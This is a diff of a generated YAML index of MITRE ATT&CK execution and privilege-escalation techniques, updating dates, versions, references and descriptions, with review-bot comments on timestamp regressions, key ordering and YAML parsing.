x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24377,11 +24697,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24433,9 +24752,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24484,7 +24802,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
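Review bot: `modified` for T1574.012 moves backwards, from 2022-04-25 to 2021-08-30 (the `-`/`+` pair at the top of this hunk); a refresh should never regress an object's `modified` timestamp, and the next hunk removes the object's `x_mitre_attack_spec_version: 2.1.0` without replacing it, which is what an older copy of the object would look like. Check which STIX bundle the regeneration was run against before merging.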
@@ -24522,30 +24840,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
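Review bot: the new citation key in the T1053.005 description is split across two lines of the double-quoted scalar (`(Citation: Red Canary - Atomic Red` / `Team)`); YAML folds the line break inside a double-quoted scalar into a single space, so the key resolves to `Red Canary - Atomic Red Team`, which matches the `source_name` added further down. Worth a quick `yaml.safe_load` on the regenerated file to confirm the key is intact, since a stray escape in this scalar (note the `\"hidden\"` on the trailing context line) would break the whole document.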
@@ -24592,7 +24909,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24624,8 +24941,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24639,6 +24956,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
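Review bot: the added `Red Canary - Atomic Red Team` reference points at this repository's own `atomics/T1053.005/T1053.005.md` on `master`, an unpinned, moving target; that is upstream ATT&CK data and should not be edited in the generated index, but a note in the generator README that the index can cite its own repo would stop someone from "fixing" the URL locally on the next regeneration.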
@@ -24651,16 +24972,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24726,7 +25050,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24803,66 +25126,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
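Review bot: this hunk removes 54 lines of the T1059.007 object (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `type`, `created`, `external_references`, and so on) only for the next hunk to re-add them lower in the object in a different key order; the only substantive change here is the `modified` date. Emitting keys in a stable order (or sorting them) in the generator would shrink these hunks to the real changes and make future regenerations reviewable.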
@@ -24875,31 +25143,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
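Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM) is dropped from T1059.007 in this hunk, while T1053.003 later in the same patch keeps `x_mitre_permissions_required: - User`; confirm this mirrors the upstream object rather than a generator omission, and check that nothing in the index tooling filters tests on that field. The rest of the hunk is the re-added block from the previous hunk plus the `x_mitre_version` bump to 2.2.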
@@ -24957,9 +25277,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -25051,20 +25370,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -25092,7 +25410,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -25112,33 +25430,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25155,6 +25453,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -25165,9 +25464,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -25175,8 +25478,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -25216,7 +25535,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
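Review bot: second timestamp regression in this patch: `modified` for T1559.001 goes from 2022-04-25 back to 2021-07-26, and the following hunk removes its `x_mitre_attack_spec_version: 2.1.0` with no replacement, exactly as for T1574.012 above. Two objects moving backwards while their siblings move to 3.2.0 suggests the source bundle mixes releases; suggest regenerating from a single ATT&CK release and diffing again.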
@@ -25241,12 +25560,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
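Review bot: T1559.001 goes straight from `x_mitre_remote_support: true` to `atomic_tests: []` with no `identifier:` line, and T1053 in the same hunk has none either, whereas T1053.005, T1047, T1129 and T1059.007 above all carry `identifier: <technique id>`; this is unchanged context, so it predates the patch, but the generator should emit `identifier` uniformly (or not at all) so consumers do not have to fall back to the mapping key.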
@@ -25326,11 +25643,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25390,12 +25706,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25493,9 +25808,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25512,19 +25827,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
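Review bot: the `exectuable` to `executable` fix in the T1059.010 description is fine and matches the upstream `modified` bump to 2024-04-28. The unchanged line just above it, "adversaries have used for AHK to execute payloads", still carries a stray "for"; since this file is generated from ATT&CK, that should be raised upstream rather than patched here.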
@@ -25533,7 +25847,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
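Review bot: the new contributor entry is double-quoted (`"@_montysecurity"`) and that is required, not cosmetic: `@` is a reserved indicator in YAML and cannot start a plain scalar, so an unquoted `- @_montysecurity` would fail to parse. Good that the generator quotes it; worth keeping a parse check in CI so a future handle with a leading `@`, `*` or `&` does not break the index.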
@@ -25570,11 +25884,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25611,11 +25924,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
